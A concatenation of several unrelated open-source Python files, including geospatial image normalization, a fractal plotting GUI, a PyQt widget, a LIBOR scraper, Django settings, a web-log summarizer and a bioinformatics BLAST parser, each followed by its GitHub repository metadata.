"name": "Go",
"bytes": "1285854"
},
{
"name": "HTML",
"bytes": "4681865"
},
{
"name": "Java",
"bytes": "869263"
},
{
"name": "Jupyter Notebook",
"bytes": "2611125"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "62216"
},
{
"name": "Objective-C",
"bytes": "15634"
},
{
"name": "Objective-C++",
"bytes": "101475"
},
{
"name": "PHP",
"bytes": "5191"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "40335927"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "553"
},
{
"name": "Shell",
"bytes": "487251"
},
{
"name": "Smarty",
"bytes": "6976"
}
],
"symlink_target": ""
} |
'''
Copyright 2015 Planet Labs, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from osgeo import gdal
from radiometric_normalization import gimage
from radiometric_normalization import transformation
def generate(candidate_path, reference_path, pif_mask,
method='linear_relationship', last_band_alpha=False):
''' Calculates the transformations between the PIF pixels of the candidate
image and PIF pixels of the reference image.
:param str candidate_path: Path to the candidate image
:param str reference_path: Path to the reference image
:param array pif_mask: A boolean array in the same coordinate system of the
candidate/reference image (True for the PIF)
:param str method: Which method to find the transformation
:returns: A list of linear transformations (one for each band)
'''
if method == 'linear_relationship':
c_ds, c_alpha, c_band_count = _open_image_and_get_info(
candidate_path, last_band_alpha)
r_ds, r_alpha, r_band_count = _open_image_and_get_info(
reference_path, last_band_alpha)
_assert_consistent(c_alpha, r_alpha, c_band_count, r_band_count)
transformations = []
for band_no in range(1, c_band_count + 1):
c_band = gimage.read_single_band(c_ds, band_no)
r_band = gimage.read_single_band(r_ds, band_no)
transformations.append(
transformation.generate_linear_relationship(
c_band, r_band, pif_mask))
else:
raise NotImplementedError('Only "linear_relationship" '
'method is implemented.')
return transformations
def _open_image_and_get_info(path, last_band_alpha):
gdal_ds = gdal.Open(path)
alpha_band, band_count = gimage.read_alpha_and_band_count(
gdal_ds, last_band_alpha=last_band_alpha)
return gdal_ds, alpha_band, band_count
def _assert_consistent(c_alpha, r_alpha, c_band_count, r_band_count):
assert r_band_count == c_band_count
assert r_alpha.shape == c_alpha.shape
| {
"content_hash": "e0df141be6cf449b6408c64da10663fe",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 79,
"avg_line_length": 40.65079365079365,
"alnum_prop": 0.6884029675907849,
"repo_name": "planetlabs/radiometric_normalization",
"id": "d0bf9c089a0cbccb23636a4c0d210f2ad8670c31",
"size": "2561",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "radiometric_normalization/wrappers/transformation_wrapper.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "106911"
},
{
"name": "Shell",
"bytes": "955"
}
],
"symlink_target": ""
} |
import matplotlib
# use the Tk backend
matplotlib.use('TkAgg')
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from mpl_toolkits.mplot3d import Axes3D
import os
import subprocess
import sys
import time
import Tkinter as tk
# Map fractals to odeint function names
fractals = {
"Barnsley's fern" : 'barnsley',
#"Cantor set" : 'cantor',
"Heighway's dragon" : 'heighway',
"Koch curve" : 'koch_curve',
"Maple leaf" : 'maple_leaf',
"Sierpinski's triangle" : 'sierpinski',
}
class OdeIntGui(object):
def __init__(self, master, program_path):
self.program_path = program_path
#---- Main frame
self.frame = tk.Frame(master)
self.frame.pack(expand=True, fill=tk.BOTH)
#----
#---- Subframes
self.frame_menus = tk.Frame(self.frame)
self.frame_entries = tk.Frame(self.frame)
self.frame_canvas = tk.Frame(self.frame)
self.frame_buttons = tk.Frame(self.frame)
self.frame_menus.pack(expand=True, fill=tk.BOTH, padx=8)
self.frame_entries.pack(expand=True, fill=tk.BOTH, padx=8)
self.frame_canvas.pack(expand=True, fill=tk.BOTH, padx=8)
self.frame_buttons.pack(expand=True, fill=tk.BOTH, padx=8, pady=8)
#----
#---- String variables
self.fractal = tk.StringVar(self.frame_menus)
# SET DEFAULTS HERE
self.fractal.set("Barnsley's fern")
self.prev_fractal = self.fractal.get()
#----
#---- Integer variables
self.niter = tk.IntVar(self.frame_entries)
#----
#---- Menu subframe
self.label_fractals = tk.Label(self.frame_menus, text="Fractal:")
self.menu_fractals = tk.OptionMenu(self.frame_menus, self.fractal,
*fractals.keys(),
command=self.menu_onclick)
self.label_niter = tk.Label(self.frame_menus,
text="Number of iterations:")
self.entry_niter = tk.Entry(self.frame_menus, textvariable=self.niter,
width=5)
self.label_fractals.pack(expand=True, fill=tk.BOTH, side=tk.LEFT)
self.menu_fractals.pack(expand=True, fill=tk.BOTH, side=tk.LEFT)
self.label_niter.pack(expand=True, fill=tk.BOTH, side=tk.LEFT)
self.entry_niter.pack(expand=True, fill=tk.BOTH, side=tk.LEFT)
#----
#---- Canvas subframe
self.figure = Figure(figsize=(7.8, 4.5))
self.canvas = FigureCanvasTkAgg(self.figure, self.frame_canvas)
self.canvas.get_tk_widget().pack(expand=True, fill=tk.BOTH)
self.toolbar = NavigationToolbar2TkAgg(self.canvas, self.frame_canvas)
self.toolbar.update()
self.canvas._tkcanvas.pack(expand=True, fill=tk.BOTH)
#----
#---- Button subframe
self.button_plot = tk.Button(self.frame_buttons, text="Plot",
command=self.plot)
self.button_clear = tk.Button(self.frame_buttons, text="Clear",
command=self.clear_figure)
self.button_quit = tk.Button(self.frame_buttons, text="Quit",
command=self.frame.quit)
self.button_plot.pack(expand=True, fill=tk.BOTH, side=tk.LEFT)
self.button_clear.pack(expand=True, fill=tk.BOTH, side=tk.LEFT)
self.button_quit.pack(expand=True, fill=tk.BOTH, side=tk.LEFT)
#----
def menu_onclick(self, event):
print "%s with %s iterations" % (self.fractal.get(), self.niter.get())
self.clear_figure()
prev_fractal = self.fractal.get()
def plot(self):
cmd = ("%s -f %s -n %s" % (self.program_path,
fractals[self.fractal.get()],
self.niter.get()))
print cmd
print "Computing..."
t0 = time.clock()
# heard "shell=True" might not be safe?
integration = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
t1 = time.clock()
print "Finished in %.9f s" % (t1 - t0)
print "Processing data..."
integration_stdout = integration.communicate()[0]
print "Plotting..."
data = []
for line in integration_stdout.split("\n"):
if line != "":
data.append(map(float, line.strip().split(" ")))
arrays = zip(*data)
self.graph = self.figure.add_subplot(111)
self.graph.scatter(arrays[0], arrays[1], s=1)
self.canvas.draw()
def clear_figure(self):
self.figure.clear()
self.canvas.draw()
def center(win):
"""Centers the window on the screen."""
win.update_idletasks()
width = win.winfo_width()
height = win.winfo_height()
x = (win.winfo_screenwidth() // 2) - (width // 2)
y = (win.winfo_screenheight() // 2) - (height // 2)
win.geometry('{}x{}+{}+{}'.format(width, height, x, y))
def print_usage():
print "python fractalsgui.py [program_path]"
def main():
if len(sys.argv) == 1:
print "Program path not given; defaulting to ../src/draw"
program_path = "../src/draw"
elif len(sys.argv) == 2:
program_path = sys.argv[1]
print "Using " + program_path
else:
print_usage()
sys.exit(0)
if not os.path.isfile(program_path):
raise ValueError("File " + program_path + " does not exist")
root = tk.Tk()
root.geometry('640x480')
root.title("fractals GUI")
#center(root)
odeintgui = OdeIntGui(root, program_path)
root.mainloop()
if __name__ == '__main__':
main()
| {
"content_hash": "c8bcc3ac20444f94ce783dd08a34d921",
"timestamp": "",
"source": "github",
"line_count": 160,
"max_line_length": 88,
"avg_line_length": 36.33125,
"alnum_prop": 0.5690693273696886,
"repo_name": "pauljxtan/fractals",
"id": "a267a29b34aa450f04e994a420ec0b927e402ec3",
"size": "5859",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/fractalsgui.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "14297"
},
{
"name": "Makefile",
"bytes": "342"
},
{
"name": "Python",
"bytes": "6768"
}
],
"symlink_target": ""
} |
from PyQt5.uic import loadUiType
from PyQt5.QtWidgets import QDataWidgetMapper
import os
ROOT_PATH = os.getcwd()
DynVarBase, DynVarForm = loadUiType(os.path.join(ROOT_PATH, 'CycleControl', 'dynamic_var_widget.ui'))
class DynamicVariableEditor(DynVarForm, DynVarBase):
def __init__(self, parent = None):
super(DynamicVariableEditor, self).__init__()
self.setupUi(self)
self._model = None
self._data_mapper = QDataWidgetMapper(self)
@property
def model(self):
return self._model
@model.setter
def model(self, model):
self._model = model
self._data_mapper.setModel(model)
self._data_mapper.addMapping(self.dyn_var_name, 0)
self._data_mapper.addMapping(self.dyn_var_default, 1)
self._data_mapper.addMapping(self.dyn_var_start, 2)
self._data_mapper.addMapping(self.dyn_var_end, 3)
self._data_mapper.addMapping(self.dyn_var_log, 4)
self._data_mapper.addMapping(self.dyn_var_send, 5)
self._data_mapper.addMapping(self.dyn_var_stepsize, 6, 'text')
self.dyn_var_log.clicked.connect(self.dyn_var_log.clearFocus)
self.dyn_var_send.clicked.connect(self.dyn_var_send.clearFocus)
def selectionChanged(self, current_index, old_index):
self._data_mapper.setCurrentIndex(current_index.row()) | {
"content_hash": "607fb3a4cf3cdc383d75b1282dd6794b",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 101,
"avg_line_length": 36.270270270270274,
"alnum_prop": 0.6788375558867362,
"repo_name": "ultracoldYEG/cycle-control",
"id": "9c668ed74872cefcf7e270e42934aa764a3576dd",
"size": "1342",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "CycleControl/widgets/variable_editor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "111790"
}
],
"symlink_target": ""
} |
from financial_data_utils.libor.globalrates.service import Service
from financial_data_utils.libor.globalrates.parser import ParserHeaders, ParserValues
from collections import namedtuple
import datetime
class Libor :
Libor = namedtuple("Libor", ['date', 'overnight', 'week', 'month', 'month2', 'month3', 'month6', 'month12' ])
def getUSD ( self ) :
text = Service().getResponse( 'usd' ).text
ph = ParserHeaders()
ph.feed( text )
headers = ph.headers
pv = ParserValues()
pv.feed( text )
return Libor.Libor( datetime.datetime.strptime( pv.values[ 0 ], '%m-%d-%Y' ).date(),
float( pv.values[ headers.index( 'overnight' )+1 ] ),
float( pv.values[ headers.index( '1 week' )+1 ] ),
float( pv.values[ headers.index( '1 month' )+1 ] ),
float( pv.values[ headers.index( '2 months' )+1 ] ),
float( pv.values[ headers.index( '3 months' )+1 ] ),
float( pv.values[ headers.index( '6 months' )+1 ] ),
float( pv.values[ headers.index( '12 months' )+1 ] ) )
| {
"content_hash": "2620351cefcac39ea0b5af0b7e25dfd6",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 113,
"avg_line_length": 36.625,
"alnum_prop": 0.5537542662116041,
"repo_name": "creative-quant/financial-data-utils",
"id": "39b1dde44d18d567e98be4c950a603bf3641c06d",
"size": "1172",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "financial_data_utils/libor/libor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "46634"
},
{
"name": "Python",
"bytes": "20470"
}
],
"symlink_target": ""
} |
"""
Development settings and globals.
"""
from .base import *
""" DEBUG CONFIGURATION """
# Disable debugging by default.
DEBUG = True
""" END DEBUG CONFIGURATION """
""" ALLOWED HOSTS CONFIGURATION """
ALLOWED_HOSTS = ['127.0.0.1',]
""" END ALLOWED HOSTS CONFIGURATION """
""" EMAIL CONFIGURATION """
EMAIL_HOST = 'smtp.host'
EMAIL_HOST_USER = 'user'
EMAIL_HOST_PASSWORD = 'password'
EMAIL_FROM_ADDRESS = 'do-not-reply-ODM2-Admin@cuahsi.org'
RECAPTCHA_PUBLIC_KEY = 'googlerecaptchakey'
RECAPTCHA_PRIVATE_KEY = 'googlerecaptchaprivatekey'
EMAIL_USE_TLS = True
EMAIL_PORT = 123
""" EMAIL CONFIGURATION """
""" DATABASE CONFIGURATION """
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '../../ODM2SQliteBlank.db',
},
}
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': 'ODM2SQliteBlank.db',
# }
# }
""" END DATABASE CONFIGURATION """
""" END DATABASE CONFIGURATION """
""" SENSOR DASHBOARD CONFIGURATION """
SENSOR_DASHBOARD = {
"time_series_days": 30,
"featureactionids": [1699, 1784,1782,1701],
}
""" END SENSOR DASHBOARD CONFIGURATION"""
""" MAP CONFIGURATION """
MAP_CONFIG = {
"lat": 0,
"lon": 0,
"zoom": 2,
"cluster_feature_types": ['Profile','Specimen','Excavation','Field area'],
"time_series_months": 1,
"display_titles": True,
"MapBox": {
"access_token": 'mapbox accessToken'
},
"result_value_processing_levels_to_display": [1, 2, 3],
"feature_types": ['Site','Profile','Specimen','Excavation','Field area',
'Weather station','Observation well','Stream gage','Transect']
}
""" END MAP CONFIGURATION """
""" DATA DISCLAIMER CONFIGURATION """
DATA_DISCLAIMER = {
"text" : "Add a link discribing where your data come from",
"linktext" : "The name of my site",
"link" : "http://mysiteswegpage.page/"
}
""" END DATA DISCLAIMER CONFIGURATION """
| {
"content_hash": "5c64ed1c1a9d2ea42c617aeea824e8d2",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 80,
"avg_line_length": 25.78481012658228,
"alnum_prop": 0.605301914580265,
"repo_name": "ocefpaf/ODM2-Admin",
"id": "6710d10eac5c4eec71d1fe2c5321641600ac94c1",
"size": "2037",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "templatesAndSettings/settings/exportdb.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "23546"
},
{
"name": "HTML",
"bytes": "196651"
},
{
"name": "JavaScript",
"bytes": "491201"
},
{
"name": "PLpgSQL",
"bytes": "270728"
},
{
"name": "Python",
"bytes": "636222"
},
{
"name": "Shell",
"bytes": "1361"
}
],
"symlink_target": ""
} |
'''
This script, when passed with location of a web log, returns the 10 most requested objects and their cumulative bytes transferred.
It only include GET requests with Successful (HTTP 2xx) responses.
To run:
python top10ObjectTransferred.py /path/to/web.log
'''
import sys
from collections import Counter
#Create new Counter with object as key and bytes as value
objectToBytesCounter = Counter()
#Open log file
for line in open(sys.argv[1],'r'):
#Split line
splitLine = line.split(" ")
#Request type e.g GET, PUT etc
requestType = splitLine[2][1:]
#Object
requestedObject = splitLine[3]
#HTTP code e.g 200,400 etc
requestedObjectHTTPCode = splitLine[5]
#Size of object in bytes
requestedObjectBytes = splitLine[6].rstrip('\n')
#If request is GET and HTTP Code is 2xx, add bytes to counter
if requestType == 'GET' and requestedObjectHTTPCode[0] == '2':
#Add keyval pair to counter
objectToBytesCounter.update({requestedObject:int(requestedObjectBytes)})
#Get top 10 requested objects with their cumulative bytes transferred and sort them ascendingly
for requestedObject in sorted(objectToBytesCounter.most_common(10)):
print requestedObject[0],requestedObject[1]
| {
"content_hash": "2545c35d16558ead9f488110deecca3a",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 130,
"avg_line_length": 37,
"alnum_prop": 0.7719594594594594,
"repo_name": "singhjaideep/Stuff",
"id": "34b9e9cd1d871b39f80b3331b0476d6cfeb7b744",
"size": "1184",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "top10ObjectTransferred.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "60662"
}
],
"symlink_target": ""
} |
from __future__ import division
__author__ = "Kishori M Konwar"
__copyright__ = "Copyright 2013, MetaPathways"
__credits__ = ["r"]
__version__ = "1.0"
__maintainer__ = "Kishori M Konwar"
__status__ = "Release"
try:
from os import makedirs, sys, remove, rename
from sys import path
import re, math, traceback
from copy import copy
from optparse import OptionParser, OptionGroup
from libs.python_modules.utils.metapathways_utils import parse_command_line_parameters, fprintf, printf, eprintf, exit_process, ShortenORFId
from libs.python_modules.utils.sysutil import getstatusoutput
except:
print """ Could not load some user defined module functions"""
print """ Make sure your typed 'source MetaPathwaysrc'"""
print """ """
sys.exit(3)
usage= sys.argv[0] +" -i/--input <input> -o/--output <output> -t/--type <HMM/LAST/BLAST> -l/--list <listfile> [ -a OPTIONAL ] """
parser = None
def createParser():
global parser
epilog = """This script parses BLAST/LAST or HMMSCAN search results of the amino acid sequences against the reference protein databases, in a tabular format."""
parser = OptionParser(usage, epilog= epilog)
parser.add_option("-i", "--input", dest="input", default=None,
help='the input blastout files [at least 1 REQUIRED]')
parser.add_option("-o", "--output", dest="output", default=None,
help='the parsed output file [REQUIRED]')
parser.add_option("-a", "--append", dest="append", action="store_true", default=False,
help='open the output file in the append mode [OPTIONAL , default = False]')
parser.add_option("-t","--type", dest="input_type", choices = ['HMM', 'LAST1', 'LAST2'], default=None,
help='the type of input : HMMSCAN or LAST/BLAST output [REQUIRED]')
parser.add_option("-l", "--list", dest="gene_list", default=None,
help='the list of genes to look for [REQUIRED]')
def check_arguments(opts, args):
if opts.input == None:
print "There sould be at least one input file"
return False
if opts.output == None:
print "There sould be at least one output file"
return False
if opts.input_type == None:
print "Input type not specified"
return False
if opts.gene_list==None:
print "Gene/Enzyme name list not specified"
return False
return True
def create_query_dictionary(blastoutputfile, query_dictionary, algorithm, errorlogger= None ):
seq_beg_pattern = re.compile("^#")
try:
blastoutfh = open( blastoutputfile,'r')
except:
print "ERROR : cannot open B/LAST output file " + blastoutputfile + " to parse "
return
try:
for line in blastoutfh:
if not seq_beg_pattern.search(line):
words = line.rstrip().split('\t')
if len(words) != 12:
continue
if algorithm =='BLAST':
if not words[1] in query_dictionary:
query_dictionary[words[1]] = True
if algorithm =='LAST':
if not words[1] in query_dictionary:
query_dictionary[words[1]] = True
blastoutfh.close()
except:
eprintf("\nERROR : while reading B/LAST output file " + blastoutputfile + " to parse " +\
" : make sure B/LAST ing was done for the particular database")
if errorlogger:
errorlogger.write("\nERROR : while reading B/LAST output file %s to parse\n" %(blastoutputfile))
errorlogger.write(" : make sure B/LAST ing was done for the particular database\n")
pass
def create_dictionary(databasemapfile, annot_map, query_dictionary, errorlogger= None):
if not query_dictionary:
print "WARNING : empty query dictionary in parse B/LAST"
if errorlogger:
errologger.write("WARNING : empty query dictionary in parse B/LAST\n")
return
seq_beg_pattern = re.compile(">")
try:
dbmapfile = open( databasemapfile,'r')
except:
if errorlogger:
errologger.write("PARSE_BLAST\tERROR\tCannot open database map file %s\t Please check the file manuallyT\n" %(databasemapfile) )
exit_process("ERROR: Cannot open database map file %s\n" %(databasemapfile))
for line in dbmapfile:
if seq_beg_pattern.search(line):
words = line.rstrip().split()
name = words[0].replace('>','',1)
if not name in query_dictionary:
continue
words.pop(0)
if len(words)==0:
annotation = 'hypothetical protein'
else:
annotation = ' '.join(words)
annot_map[name] = annotation
dbmapfile.close()
if len(annot_map)==0:
if errorlogger:
errorlogger.write( "PARSE_BLAST\tERROR\tFile "+databasemapfile+ " seems to be empty!\tCreate datbasemap file\n")
errorlogger.write( "Try re-running after deleting file : %s\n" %(databasemapfile))
exit_process( "no anntations in file :" + databasemapfile)
class BlastOutputParser(object):
commentPATTERN = re.compile(r'^#')
commentLAST_VERSION_PATTERN = re.compile(r'^#.*LAST[\s]+version[\s]+\d+')
def create_refBitScores(self):
refscorefile = open(self.refscore_file,'r')
for line in refscorefile:
words =[ x.strip() for x in line.split('\t') ]
if len(words) == 2:
orfid = ShortenORFId(words[0])
try:
self.refBitScores[orfid]= int((self.Lambda*float(words[1]) - self.lnk )/self.ln2)
except:
self.refBitScores[orfid]= int(1)
refscorefile.close()
def __init__(self, dbname, blastoutput, database_mapfile, refscore_file, opts, errorlogger =None):
self.Size = 10000
self.dbname = dbname
self.ln2 = 0.69314718055994530941
self.lnk = math.log(opts.k)
self.Lambda = opts.Lambda
self.blastoutput = blastoutput
self.database_mapfile =database_mapfile
self.refscore_file = refscore_file
self.annot_map = {}
self.i=0
self.opts = opts
self.hits_counts = {}
self.data = {}
self.refscores = {}
self.refBitScores = {}
self.needToPermute = False;
self.MAX_READ_ERRORS_ALLOWED = 10
self.ERROR_COUNT = 0
self.STEP_NAME = 'PARSE_BLAST'
self.error_and_warning_logger = errorlogger
#print "trying to open blastoutput file " + blastoutput
query_dictionary = {}
create_query_dictionary(self.blastoutput, query_dictionary, self.opts.algorithm, errorlogger = errorlogger)
try:
self.blastoutputfile = open(self.blastoutput,'r')
except:
eprintf("\nERROR : cannot open B/LAST output file " + blastoutput + " to parse "+\
" : make sure \"B/LAST\"ing was done for the particular database" )
if self.error_and_warning_logger:
self.error_and_warning_logger.write("ERROR : cannot open B/LAST output file %s %s to parse \n" +\
" : make sure \"B/LAST\"ing was done for "+\
"the particular database" %(blastoutput) )
exit_process( "Cannot open B/LAST output file " + blastoutput )
try:
self.create_refBitScores()
except:
print traceback.print_exc(10)
exit_process( "Error while reading from B/LAST refscore file " + self.refscore_file )
try:
create_dictionary(database_mapfile, self.annot_map, query_dictionary)
query_dictionary = {}
except AttributeError:
eprintf("Cannot read the map file for database : %s\n" % (dbname))
if errorlogger!= None:
errorlogger.write("PARSE_BLAST\tERROR\tCannot read the map file %s for database : %s\tDelete the formatted files for the database in the \"formatted\" folder\n" %(database_mapfile, dbname))
exit_process("Cannot read the map file for database " + dbname)
def setMaxErrorsLimit(self, max):
self.MAX_READ_ERRORS_ALLOWED = max
def setErrorAndWarningLogger(self, logger):
self.error_and_warning_logger = logger
def setSTEP_NAME(self, step_name):
self.STEP_NAME = step_name
def incErrorCount(self):
self.ERROR_COUNT += 1
def maxErrorsReached(self):
return (self.ERROR_COUNT > self.MAX_READ_ERRORS_ALLOWED)
def __iter__(self):
return self
def permuteForLAST(self, words):
try :
temp = copy(words)
words[0] = temp[6] # query
words[1] = temp[1] # target
words[2] = 100.0 # percent id
words[3] = temp[3] #aln length
words[6] = temp[2]
words[7] = int(temp[2]) + int(temp[3]) - 1
words[10] = 0.0 # evalue
words[11] = temp[0]
except:
eprintf("ERROR : Invalid B/LAST output file %s \n" % (self.blastoutput))
if self.error_and_warning_logger:
self.error_and_warning_logger.write("ERROR : Invalid B/LAST output file" %(self.blastoutput))
exit_process( "ERROR : Invalid B/LAST output file %s " % (self.blastoutput))
def refillBuffer(self):
i = 0
self.lines = []
line = True # self.blastoutputfile.readline()
while line and i < self.Size:
line=self.blastoutputfile.readline()
if self.commentPATTERN.match(line):
if self.commentLAST_VERSION_PATTERN.match(line) ==False:
self.needToPermute = True
continue
self.lines.append(line)
if not line:
break
i += 1
self.size = len(self.lines)
def next(self):
if self.i % self.Size ==0:
self.refillBuffer()
if self.i % self.Size < self.size:
words = [ x.strip() for x in self.lines[self.i % self.Size].rstrip().split('\t')]
if len(words) != 12:
self.i = self.i + 1
return None
'''shorten the ORF id'''
words[0] = ShortenORFId(words[0])
#if self.opts.algorithm =='LAST':
if self.needToPermute:
self.permuteForLAST(words)
if not words[0] in self.hits_counts:
self.hits_counts[words[0]] = 0
if self.hits_counts[words[0]] >= self.opts.limit:
self.i = self.i + 1
return None
if len(words) != 12 or not self.isWithinCutoffs(words, self.data, self.opts, self.annot_map, self.refBitScores):
self.i = self.i + 1
return None
self.hits_counts[words[0]] += 1
self.i = self.i + 1
try:
return self.data
except:
return None
else:
self.blastoutputfile.close()
raise StopIteration()
def isWithinCutoffs(self, words, data, cutoffs, annot_map, refbitscores):
try:
orfid = ShortORFId(words[0])
except:
orfid = words[0]
data['query'] = orfid
try:
data['target'] = words[1]
except:
data['target'] = 0
try:
data['q_length'] = int(words[7]) - int(words[6]) + 1
except:
data['q_length'] = 0
try:
data['bitscore'] = float(words[11])
except:
data['bitscore'] = 0
try:
data['bsr'] = float(words[11])/refbitscores[orfid]
except:
#print "words 0 " + str(refscores[words[0]])
#print "words 11 " + str( words[11])
data['bsr'] = 0
try:
data['expect'] = float(words[10])
except:
data['expect'] = 0
try:
data['aln_length'] = float(words[3])
except:
data['aln_length'] = 0
try:
data['identity'] = float(words[2])
except:
data['identity'] = 0
try:
data['product'] = annot_map[words[1]]
except:
eprintf("Sequence with name \"" + words[1] + "\" is not present in map file\n")
if self.error_and_warning_logger:
self.error_and_warning_logger.write("Sequence with name %s is not present in map file " %(words[1] ))
self.incErrorCount()
if self.maxErrorsReached():
if self.error_and_warning_logger:
self.error_and_warning_logger.write("Number of sequence absent in map file %s exceeds %d" %(self.blastoutput, self.ERROR_COUNT ))
exit_process("Number of sequence absent in map file %s exceeds %d" %(self.blastoutput, self.ERROR_COUNT ))
data['product'] = 'hypothetical protein'
try:
m = re.search(r'(\d+[.]\d+[.]\d+[.]\d+)', data['product'])
if m != None:
data['ec'] = m.group(0)
else:
data['ec'] = ''
except:
data['ec'] = ''
if cutoffs.taxonomy:
try:
m = re.search(r'\[([^\[]+)\]', data['product'])
if m != None:
data['taxonomy'] = m.group(1)
else:
data['taxonomy'] = ''
except:
data['taxonomy'] = ''
if cutoffs.remove_taxonomy:
try:
data['product'] = re.sub(r'\[([^\[]+)\]','', data['product'])
except:
data['product'] = ''
if cutoffs.remove_ec:
try:
data['product'] = re.sub(r'\([Ee][Ce][:]\d+[.]\d+[.]\d+[.]\d+\)', '', data['product'])
data['product'] = re.sub(r'\[[Ee][Ce][:]\d+[.]\d+[.]\d+[.]\d+\]', '', data['product'])
data['product'] = re.sub(r'\[[Ee][Ce][:]\d+[.]\d+[.]\d+[.-]\]', '', data['product'])
data['product'] = re.sub(r'\[[Ee][Ce][:]\d+[.]\d+[.-.-]\]', '', data['product'])
data['product'] = re.sub(r'\[[Ee][Ce][:]\d+[.-.-.-]\]', '', data['product'])
except:
data['product'] = ''
if data['q_length'] < cutoffs.min_length:
return False
if data['bitscore'] < cutoffs.min_score:
return False
if data['expect'] > cutoffs.max_evalue:
return False
if data['identity'] < cutoffs.min_identity:
return False
if data['bsr'] < cutoffs.min_bsr:
return False
#min_length'
#'min_score'
#'max_evalue'
# 'min_identity'
#'limit'
#'max_length'
#'min_query_coverage'
#'max_gaps'
#min_bsr'
return True
def read_gene_list(gene_list):
inputfile = open(gene_list, 'r')
list = {}
for line in inputfile:
list[line.strip()] = True
inputfile.close()
return list.keys()
rePATT1 = re.compile(r'/')
rePATT2 = re.compile(r'|')
rePATT3 = re.compile(r' ')
# check if the string has one of the genes
def find_gene_name(string, gene_list, gene_dict):
fields = [ string.strip().lower() ]
_field_dict = {}
if rePATT1.search(string):
_field_dic = {}
for field in fields:
_fields = [ x.strip() for x in field.split('/') if len(x.strip()) ]
for _field in _fields:
_field_dict[_field] = True
fields = _field_dict.keys()
if rePATT2.search(string):
_field_dic = {}
for field in fields:
_fields = [ x.strip() for x in field.split('|') if len(x.strip()) ]
for _field in _fields:
_field_dict[_field] = True
fields = _field_dict.keys()
if rePATT3.search(string):
_field_dic = {}
for field in fields:
_fields = [ x.strip() for x in field.split(' ') if len(x.strip()) ]
for _field in _fields:
_field_dict[_field] = True
fields = _field_dict.keys()
for word in fields:
if word in gene_dict:
return word
return None
# check if the hmm hit is in the list
def find_hmm_name(string, gene_list, gene_dict):
if string in gene_dict:
return string
return None
# compute the refscores
def process_input(input, output, input_type , gene_list, append, errorlogger = None):
commentPATT = re.compile(r'^#')
count = 0
mode = 'w'
if append:
mode = 'a'
gene_list = read_gene_list(gene_list)
gene_dict = {}
for gene in gene_list:
gene_dict[gene.lower()] = gene # re.compile(r'[\/\s]' + gene + '[\/\s]')
if input_type=='LAST2':
q = 0
t = 9
if input_type=='LAST1':
q = 0
t = 1
if input_type=='HMM':
q = 2
t = 0
try:
inputfile = open(input, 'r')
outputfile = open(output, mode)
except:
if errorlogger:
errorlogger.write("PARSE_BLAST\tERROR\tCannot open temp file %s to sort\tfor reference db\n" %(soutput_blastoutput_parsed_tmp, dbname))
exit_process("PARSE_BLAST\tERROR\tCannot open temp file %s to sort\tfor reference db\n" %(soutput_blastoutput_parsed_tmp, dbname))
for line in inputfile:
result = commentPATT.search(line)
if result:
continue
fields = [ x.strip() for x in line.split('\t') ]
if len(fields) < 3:
continue
orfid = fields[q]
#if input_type=='LAST1' or input_type=='LAST2':
target = find_gene_name(fields[t], gene_list, gene_dict)
if target==None:
continue
fprintf(outputfile, "%s\t%s\n",orfid, gene_dict[target]);
outputfile.close()
inputfile.close()
# rename(output_blastoutput_parsed_tmp, output_blastoutput_parsed)
return count
# the main function
def main(argv, errorlogger = None, runstatslogger = None):
global parser
(opts, args) = parser.parse_args(argv)
if not check_arguments(opts, args):
print usage
sys.exit(0)
if errorlogger:
errorlogger.write("#STEP\tPARSE_BLAST\n")
unique_count = process_input(opts.input, opts.output, opts.input_type , opts.gene_list, opts.append, errorlogger = errorlogger)
if runstatslogger:
runstatslogger.write("%s\tTotal Protein Annotations %s (%s)\t%s\n" %( str(priority), dbname, opts.algorithm, str(count)))
runstatslogger.write("%s\tNumber of ORFs with hits in %s (%s)\t%s\n" %( str(priority1), dbname, opts.algorithm, str(unique_count)))
def MetaPathways_parse_blast(argv, errorlogger = None, runstatslogger = None):
createParser()
main(argv, errorlogger = errorlogger, runstatslogger = runstatslogger)
return (0,'')
# the main function of metapaths
if __name__ == "__main__":
createParser()
main(sys.argv[1:])
| {
"content_hash": "ecae11476eaa06ea2f7e4fbb4526effb",
"timestamp": "",
"source": "github",
"line_count": 585,
"max_line_length": 203,
"avg_line_length": 33.15042735042735,
"alnum_prop": 0.5450420254731089,
"repo_name": "Koonkie/MetaPathways_Python_Koonkie.3.0",
